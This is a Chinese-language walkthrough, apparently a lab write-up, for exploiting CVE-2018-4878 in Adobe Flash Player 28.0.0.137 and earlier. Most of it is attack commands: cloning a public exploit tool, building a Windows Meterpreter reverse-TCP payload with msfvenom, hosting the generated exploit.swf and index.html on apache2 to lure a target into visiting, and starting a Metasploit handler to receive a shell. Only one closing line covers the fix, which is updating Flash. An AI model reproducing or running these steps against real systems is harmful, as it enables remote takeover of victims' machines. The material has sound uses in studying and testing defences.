漏洞描述
此漏洞是针对与安装flash 28.0.0.137版本及小于此版本的用户,攻击者诱导用户点击恶意网站,可直接获取shell权限。
影响版本
小于或等于 Adobe Flash Player 28.0.0.137 版本
漏洞检测
利用工具:
https://github.com/anbai-inc/CVE-2018-4878
将index.html与exploit.swf放到我们自己的web服务器上,让目标机去访问。有时能弹出计算机,有时会出现ie浏览器崩溃,估计是脚本不稳定的原因。
漏洞利用
Adobe Flash Player 28.0.0.137 下载:
https://pan.baidu.com/s/1Si3PDbR6cGwkGITJUTikYg 提取码:p9ok
攻击机:kali
目标机:windows7 +Adobe Flash Player 28.0.0.137
kali先下载利用工具:
git clone https://github.com/anbai-inc/CVE-2018-4878.git
cd CVE-2018-4878
msfvenom生成shellcode:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.206.128 lport=4444 -f python>./shellcode.txt
将shellcode.txt文本里的shellcode替换掉cve-2018-4847.py中的shellcode
继续修改swf和html生成路径(exp生成目录)
运行脚本,生成exp:
python cve-2018-4878.py
启动apache2:
service apache2 start
复制exp到web目录:
cp exploit.swf /var/www/html/
cp index.html /var/www/html/
msf开启监听:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.206.128
set lport 4444
run
shell
whoami
当目标去访问我们生成的html时,将会获取shell权限
不过后面发现有时候会不成功,一样是造成ie崩溃。
漏洞加固
更新flash插件:https://www.flash.cn/